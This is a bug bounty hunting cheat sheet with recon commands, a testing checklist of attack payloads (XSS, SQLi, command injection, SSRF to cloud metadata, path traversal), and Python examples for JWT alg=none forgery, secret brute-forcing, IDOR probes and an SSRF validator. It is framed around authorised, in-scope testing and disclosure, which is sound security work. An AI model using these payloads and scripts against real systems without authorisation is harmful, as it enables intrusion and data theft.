01 · Program Selection Strategy
Green flags — hunt here
- Program launched < 6 months ago (fresh, fewer hunters)
- Wide scope: *.company.com instead of specific subdomains
- Mobile apps, APIs, and admin panels in scope
- Response time < 7 days median (active triagers)
- Bounty table shown publicly — means they actually pay
- Private program invite — less competition, higher payouts
- Company is mid-size SaaS (50–500 employees) — more attack surface
- Low number of public resolved reports (< 50)
Red flags — avoid at start
- Scope limited to 1 or 2 specific URLs only
- Reward is "Hall of Fame only" — no cash
- Google, Facebook, Microsoft, Apple — saturated
- Response time > 30 days (slow or dead team)
- Many "Duplicate" or "Informative" closed reports visible
- Scope excludes IDOR, rate limiting, account enum
- Report template asks for extreme PoC complexity
- No bounty table — or "rewards at our discretion"
Program scoring — decide in 5 min
Score > 7/10 on the criteria above → hunt it. Under 5 → skip unless it's private and you were invited.
02 · Recon Workflow
①Read scope
②Subdomain enum
③Port & HTTP probe
④Screenshot all
⑤JS & API harvest
⑥Manual triage
Subdomain enumeration
subfinder -d target.com -silent -o subs.txt
amass enum -passive -d target.com >> subs.txt
assetfinder --subs-only target.com >> subs.txt
# Certificate transparency (quote the URL: an unquoted '&' backgrounds the command)
curl -s "https://crt.sh/?q=%25.target.com&output=json" \
  | jq -r '.[].name_value' | sed 's/^\*\.//' >> subs.txt
sort -u subs.txt -o subs_unique.txt
HTTP probing & screenshots
httpx -l subs_unique.txt -o live.txt \
-status-code -title -tech-detect
eyewitness --web -f live.txt -d screens/
# Nuclei scan (CVEs + misconfigs)
nuclei -l live.txt -t ~/nuclei-templates/ \
-severity medium,high,critical
JS & endpoint harvest
# Extract endpoints from JS files
gau target.com | grep -E '\.js(\?|$)' | sort -u > js.txt
cat js.txt | xargs -I{} python3 linkfinder.py \
-i {} -o cli >> endpoints.txt
# Find hidden params
arjun -u https://target.com/api/user \
-oJ params.json
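The JS harvest above relies on linkfinder; the following is an added example (not part of the original cheat sheet, not linkfinder's code) showing the idea in a few lines of Python so you can tune it: pull quoted absolute URLs and root-relative paths out of a bundle, resolve them against the page that served the script, keep only in-scope hosts, and derive older API versions to try. The bundle text, base URL and scope suffix are constructed for the demo; string-concatenated paths (API+"/users/me") come out unjoined, which is also linkfinder's blind spot.

```python
import re
from urllib.parse import urljoin, urlparse

# Constructed stand-in for a minified bundle: not a real target's JS.
SAMPLE_JS = r'''
const API="/api/v2";fetch(API+"/users/me");
axios.get("/api/v1/admin/export?format=csv");
var legacy="https://legacy.target.com/internal/debug";
const cdn="https://cdn.example.net/lib.js";
window.open('/oauth/callback?redirect_uri=');
'''

# Quoted absolute URLs, or quoted root-relative paths (the linkfinder idea, trimmed).
ENDPOINT_RE = re.compile(r"""["'`]((?:https?://[^"'`\s]+)|(?:/[A-Za-z0-9_\-./?=&%]+))["'`]""")
VERSION_RE = re.compile(r"/v(\d+)(?=/|$)")


def extract_endpoints(js_text, base_url):
    """All URL-ish string literals, resolved against the page that served the JS."""
    return sorted({urljoin(base_url, m.group(1)) for m in ENDPOINT_RE.finditer(js_text)})


def in_scope(url, scope_suffix):
    """True for scope_suffix itself and any subdomain of it (a *.target.com scope)."""
    host = urlparse(url).hostname or ""
    return host == scope_suffix or host.endswith("." + scope_suffix)


def harvest(js_text, base_url, scope_suffix):
    """Endpoints worth a manual request: in scope, deduplicated, sorted."""
    return [u for u in extract_endpoints(js_text, base_url) if in_scope(u, scope_suffix)]


def older_versions(url):
    """/api/v3/x -> [/api/v2/x, /api/v1/x]; old versions often missed the auth rewrite."""
    m = VERSION_RE.search(url)
    if not m:
        return []
    newest = int(m.group(1))
    return [VERSION_RE.sub(f"/v{k}", url, count=1) for k in range(newest - 1, 0, -1)]


if __name__ == "__main__":
    for ep in harvest(SAMPLE_JS, "https://target.com/app", "target.com"):
        print(ep, *older_versions(ep))
```

Run it against a real bundle by replacing SAMPLE_JS with the file contents and the base URL with the page that loaded it; feed the output to ffuf or Burp Repeater, first with and then without the Authorization header.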
OSINT & forgotten assets
# Shodan — open ports, banners
shodan search --fields ip_str,port,hostnames "org:TargetCorp"
# Wayback — old endpoints
waybackurls target.com | grep "=" | sort -u
# Google dorks
site:target.com (ext:php OR ext:json)
site:target.com (inurl:api OR inurl:admin OR inurl:v1)
03 · Vulnerability Testing Checklist
Authentication & Session
- JWT: alg=none, weak secret, kid injection
- OAuth: state param missing, redirect_uri bypass
- MFA bypass: skip the step, brute-force the OTP, manipulate the verify response
- Password reset: token in referer, weak token, reuse
- Session: fixation, no invalidation on logout
- Account enum: timing or message differences on login / reset / signup errors
- Default creds: admin/admin, admin/password
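Two of the JWT checks above (alg=none and a weak HS256 secret) are easy to exercise locally before you touch the target. The block below is an added example, not code from the cheat sheet's author: it mints a token with a constructed weak secret, forges an alg=none variant with role=admin, shows a verifier that honours the header's alg accepting it next to one that pins HS256, and brute-forces the secret offline from a small constructed wordlist. Only the standard library is used; the secret, claims and wordlist are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint a normal HS256 token (stands in for the app's login endpoint)."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_alg_none(token: str, overrides: dict) -> str:
    """Attack 1: set alg to none, change claims, drop the signature entirely."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    header["alg"] = "none"
    payload.update(overrides)
    return _segment(header) + "." + _segment(payload) + "."


def brute_secret(token: str, wordlist):
    """Attack 2: offline guess of a weak HS256 secret; zero requests to the target."""
    h, p, s = token.split(".")
    sig = b64url_decode(s)
    for word in wordlist:
        guess = hmac.new(word.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, sig):
            return word
    return None


def verify_vulnerable(token: str, secret: bytes):
    """Trusts the token's alg field, so alg=none switches verification off."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(p)) if hmac.compare_digest(expected, b64url_decode(s)) else None


def verify_fixed(token: str, secret: bytes):
    """Pins the algorithm server-side; anything but HS256 is rejected outright."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(p)) if hmac.compare_digest(expected, b64url_decode(s)) else None


if __name__ == "__main__":
    token = sign_hs256({"sub": "1337", "role": "user"}, b"secret123")  # constructed weak secret
    forged = forge_alg_none(token, {"role": "admin"})
    print("vulnerable verifier:", verify_vulnerable(forged, b"secret123"))
    print("fixed verifier:", verify_fixed(forged, b"secret123"))
    print("weak secret:", brute_secret(token, ["password", "secret", "secret123"]))
```

Against a live target, send the forged token in the same header the app used and watch for a 200 instead of a 401; for the secret, point brute_secret at a real wordlist (jwt_tool does the same with more algorithms) and never report a "weak secret" without having recovered it.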
IDOR / Access Control
- Change numeric IDs: ?id=1337 → ?id=1338
- Change UUIDs to another user's UUID
- Horizontal: same role, different user's data
- Vertical: low role calling admin endpoints
- Check API endpoints with the auth header removed
- Mass assignment: add role=admin to the PUT body
- IDOR in file downloads / exports / reports
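The IDOR and mass-assignment items above come down to one missing server-side question: may this session touch this resource, and may it write this field? The block below is an added example, not the cheat sheet author's code: an in-memory user table (constructed, sequential ids) with a vulnerable and a fixed read handler, a vulnerable and a fixed update handler, and the two probes you would otherwise run by hand in Burp Repeater (call as User A with User B's id; PUT role=admin on your own profile). Field names and roles are assumptions for the demo.

```python
import copy

# Constructed store standing in for the app's user table; sequential ids are
# exactly what makes ?id=1337 -> ?id=1338 worth trying.
SEED_USERS = {
    1: {"id": 1, "email": "admin@example.com", "role": "admin"},
    1337: {"id": 1337, "email": "usera@example.com", "role": "user"},
    1338: {"id": 1338, "email": "userb@example.com", "role": "user"},
}
WRITABLE_FIELDS = {"email", "display_name"}  # assumption: what a user may edit


class Forbidden(Exception):
    pass


def fresh_store():
    return copy.deepcopy(SEED_USERS)


def get_profile_vulnerable(users, session_uid, requested_id):
    # Authenticated, but never asks whether session_uid may read requested_id.
    return users[requested_id]


def get_profile_fixed(users, session_uid, requested_id):
    # Ownership (or an admin role) is checked against the session, not the request.
    caller = users[session_uid]
    if requested_id != session_uid and caller["role"] != "admin":
        raise Forbidden("not your resource")
    return users[requested_id]


def update_profile_vulnerable(users, session_uid, body):
    # Blind merge of the request body: role=admin in a PUT becomes real.
    users[session_uid].update(body)
    return users[session_uid]


def update_profile_fixed(users, session_uid, body):
    # Allowlist the writable fields; reject (not silently drop) anything else.
    extra = set(body) - WRITABLE_FIELDS
    if extra:
        raise Forbidden(f"fields not writable: {sorted(extra)}")
    users[session_uid].update(body)
    return users[session_uid]


def idor_probe(handler, users, attacker_uid, victim_uid):
    """Repeater step: request as A with B's id. True means B's record came back."""
    try:
        data = handler(users, attacker_uid, victim_uid)
    except Forbidden:
        return False
    return data["id"] == victim_uid


def mass_assignment_probe(handler, users, uid):
    """PUT an extra role field on your own profile. True means it stuck."""
    try:
        result = handler(users, uid, {"email": "new@example.com", "role": "admin"})
    except Forbidden:
        return False
    return result["role"] == "admin"


if __name__ == "__main__":
    print("IDOR, vulnerable:", idor_probe(get_profile_vulnerable, fresh_store(), 1337, 1338))
    print("IDOR, fixed:", idor_probe(get_profile_fixed, fresh_store(), 1337, 1338))
    print("mass assignment, vulnerable:", mass_assignment_probe(update_profile_vulnerable, fresh_store(), 1337))
    print("mass assignment, fixed:", mass_assignment_probe(update_profile_fixed, fresh_store(), 1337))
```

Both probes use two accounts you own, which is the only way to test this without touching real users' data; the PoC for the report is the pair of requests (A's session, B's id) with the response bodies, plus the curl equivalent.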
XSS
- Reflected: URL params, error messages, search
- Stored: comments, profiles, notifications
- DOM-based: document.write, innerHTML sinks in JS
- CSP bypass: check the header for unsafe-inline
- Attribute injection: " onmouseover=alert(1)
- SVG/File upload: <svg onload=alert(1)>
- Blind XSS: use an XSSHunter callback
SSRF
- Params to check: url=, src=, href=, fetch=
- Internal: http://localhost/admin, http://127.0.0.1
- Cloud metadata: http://169.254.169.254/latest/meta-data/
- IPv6 literals: http://[::1]/, http://[::ffff:127.0.0.1]/ (IPv4-mapped, slips past IPv4-only denylists)
- DNS rebinding: a hostname that resolves public on the validation lookup and 127.0.0.1 on the fetch
- Blind SSRF: Burp Collaborator or interactsh
- URL parser bypass: http://evil.com@target.com (validator reads one host, the HTTP client the other)
- File: file:///etc/passwd (if the scheme is not filtered)
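Every bypass in the SSRF list above maps to a specific gap in a URL validator, so the quickest way to understand both the attack and the fix is to write the validator and throw the list at it. The block below is an added example, not the cheat sheet author's code: a scheme allowlist, a userinfo check for the evil.com@target.com trick, literal-IP parsing that unwraps IPv4-mapped IPv6, and an internal-range check on the resolved addresses. The resolver is a constructed table so it runs offline; the hostnames and addresses in it are assumptions for the demo.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver so the check runs offline. In the app this is your DNS
# lookup, and the socket must connect to the IP you validated (see the note below).
FAKE_DNS = {
    "target.com": ["93.184.216.34"],
    "internal.target.com": ["10.0.0.5"],
    "localhost": ["127.0.0.1"],
    "evil.com": ["151.101.1.1"],
}


def fake_resolve(hostname):
    return FAKE_DNS.get(hostname.lower(), [])


def is_internal(ip):
    """Private, loopback, link-local (169.254.169.254), reserved, multicast, unspecified."""
    # [::ffff:127.0.0.1] is an IPv6 literal wrapping IPv4 loopback: unwrap it first.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_outbound_url(url, resolve=fake_resolve):
    """Return (allowed, reason). Each bypass from the checklist lands on one reason."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"      # file://, gopher://
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"                           # http://evil.com@target.com
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        ips = [ipaddress.ip_address(host)]                        # literal IP, incl. [::1]
    except ValueError:
        ips = [ipaddress.ip_address(a) for a in resolve(host)]    # hostname: check every A/AAAA
    if not ips:
        return False, "unresolvable host"
    for ip in ips:
        if is_internal(ip):
            return False, f"{host} -> {ip} is internal"
    return True, "ok"


if __name__ == "__main__":
    for u in ["https://target.com/img.png", "http://169.254.169.254/latest/meta-data/",
              "http://[::ffff:127.0.0.1]/", "http://evil.com@target.com/",
              "file:///etc/passwd", "http://internal.target.com/", "http://localhost/admin"]:
        print(u, validate_outbound_url(u))
```

Two caveats a report should mention when the target has a validator like this: it only helps if the HTTP client then connects to the address that was validated (resolve once, pin the IP), otherwise DNS rebinding wins on the second lookup; and redirects must re-enter the check, since a 302 from an allowed host to 169.254.169.254 is the classic open-redirect-to-SSRF chain.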
Injection
- SQLi: ', then 1' OR '1'='1, then sqlmap --risk=1 (the default risk; raise it only where scope allows destructive tests)
- SSTI: ${7*7}, <%=7*7%> (look for 49 in the response)
- Command injection: ;id, `id`, |id
- XXE: replace the JSON body with XML and set Content-Type to application/xml
- NoSQLi: {"$gt":""} in login fields
- LDAP injection: *)(uid=*))(|(uid=*
- Path traversal: ../../../etc/passwd
Business Logic
- Negative price / quantity (cart manipulation)
- Apply coupon multiple times
- Race condition on transfers / purchases
- Skip steps in multi-step flows (go direct to step 3)
- Free trial bypass / subscription downgrade abuse
- Privilege escalation via invite token reuse
- TOCTOU: check-then-use timing flaws
04 · Impact Classification & Bounty Range
| Severity | Vulnerability type | Impact statement | H1 range (avg) |
|---|---|---|---|
| CRITICAL | RCE, Auth bypass all users, SQLi with data exfil, SSRF→internal | Full system compromise or mass data breach | $5k – $50k+ |
| HIGH | Stored XSS on admin, IDOR cross-account PII, SSRF blind, Priv esc | Significant data exposure or account takeover | $1k – $8k |
| MEDIUM | Reflected XSS, CSRF on sensitive actions, Info disclosure API | Limited data exposure or partial account control | $200 – $1k |
| LOW | Open redirect, missing headers, clickjacking, verbose errors | Minimal direct impact, assists other attacks | $50 – $300 |
Chain vulns to escalate severity: an open redirect (Low) that the SSRF filter follows (Medium) to reach the cloud metadata endpoint and pull AWS creds (Critical) is one Critical report worth $10k+. Always ask "what can I do with this?"
05 · Report Template
Required fields
TITLE
[VulnType] on [endpoint] allows [impact]
e.g. IDOR on /api/users/{id} allows reading any user's PII
IMPACT
Start with: "This vulnerability allows an attacker to…"
Be concrete — mention PII, sessions, data affected.
STEPS TO REPRODUCE
1. Log in as User A
2. Go to /api/profile/1337
3. Change id to 1338
4. Observe User B's data returned
[attach screenshot or screen recording]
REMEDIATION
Validate that the authenticated user's ID matches the requested resource ID server-side. Do not rely on client-supplied IDs.
Quality checklist before submit
- Title: 1 line, vulntype + endpoint + impact
- PoC: Video or screenshots — mandatory for XSS/IDOR
- curl command included if API-based vuln
- Tested on your own test account — never prod data
- Severity selected correctly (CVSS justified)
- No real PII of other users in screenshots
- Remediation suggestion included
- Re-read the scope page — confirm it's in scope
- Proofread for typos — professionalism matters
- Burp request/response included as text, not image
After submit: Be patient, reply fast when triager responds, never be aggressive about bounty amount. Reputation compounds.
06 · HackerOne Reputation Strategy
Rep points system
- Resolved / Triaged: +7 (awarded once per report, at triage)
- Informative: 0 (wasted time)
- Duplicate: 0 (no credit; report fast to avoid)
- Not Applicable: −5 (understand the scope and the app before submitting)
- Spam: −10
- Severity does not multiply reputation; it feeds the separate Impact score, and Signal is your average rep per report
- Rough targets: ~100 rep with positive Signal → private invites start; ~500 rep → the more selective programs open
Getting private invites
- 5+ resolved reports on public programs
- Low "noise" ratio (few informative/N/A)
- Keep Signal high: it is the average rep per report, so every N/A or spam report drags it down, and programs gate invites on it
- Specialise in one vuln class — H1 notices
- Fill your profile fully (bio, skills, socials)
- Participate in H1 live hacking events
- Write public disclosures when allowed
Avoid rep killers
- Never submit out-of-scope findings
- Never test other users' accounts without consent
- Don't spam low quality informative reports
- Don't submit theoretical only vulns without PoC
- Don't ask "what's my bounty?" before triage
- Read existing Hacktivity before submitting
- Don't disclose publicly before the fix
07 · Essential Tools Quick Reference
Recon tools
subfinder # Passive subdomain discovery
amass # Active + passive DNS enum
httpx # HTTP probe, tech detect
nuclei # Template-based vuln scan
gau # Get all URLs (wayback+)
waybackurls # Wayback Machine URLs
arjun # HTTP parameter discovery
linkfinder # JS endpoint extraction
eyewitness # Web screenshot tool
ffuf # Fast web fuzzer
Testing tools
burpsuite # Intercept, repeat, scan
sqlmap # Automated SQLi
dalfox # XSS scanner (fast)
jwt_tool # JWT attack tool
interactsh # OOB callback (SSRF/blind)
xsshunter # Blind XSS tracker
corsy # CORS misconfiguration
ssrfmap # SSRF scanner
nomore403 # 403 bypass techniques
crlfuzz # CRLF injection scanner
08 · J0$tif Field Notes
Your AD/infra advantage: when a program has VPN portals, cloud assets, or internal-facing apps in scope, go there. Most web-only hunters skip them. One SSRF into an internal service or one exposed admin panel is a Critical.
JS is underrated: Most hunters skip JS analysis. Find endpoints in JS files that are not in the docs — they're often unprotected APIs with zero authentication.
Speed beats perfection: Submit a medium-quality IDOR fast rather than perfect-report a critical slow. Duplicates kill rep. Use a simple PoC first, elaborate after.
Never test on production data: Create your own test accounts. If you accidentally hit real user data, stop and report it anyway — honesty builds reputation.
Business logic > automation: Nuclei finds what everyone finds. Business logic flaws (coupon stacking, race conditions, flow skipping) are found only by humans who understand the app. Spend 30 min reading what the app is supposed to do.
Burp history is your memory: Never clear Burp history during a session. Hidden endpoints appear in background requests you didn't trigger intentionally — watch the HTTP history while using the app normally.
API versions: If /api/v2/user has auth, try /api/v1/user. Old versions are often left exposed without proper access control.
Mobile apps: Decompile the APK with jadx, intercept with Burp + an Android emulator. Mobile API endpoints are often less tested and lack rate limiting.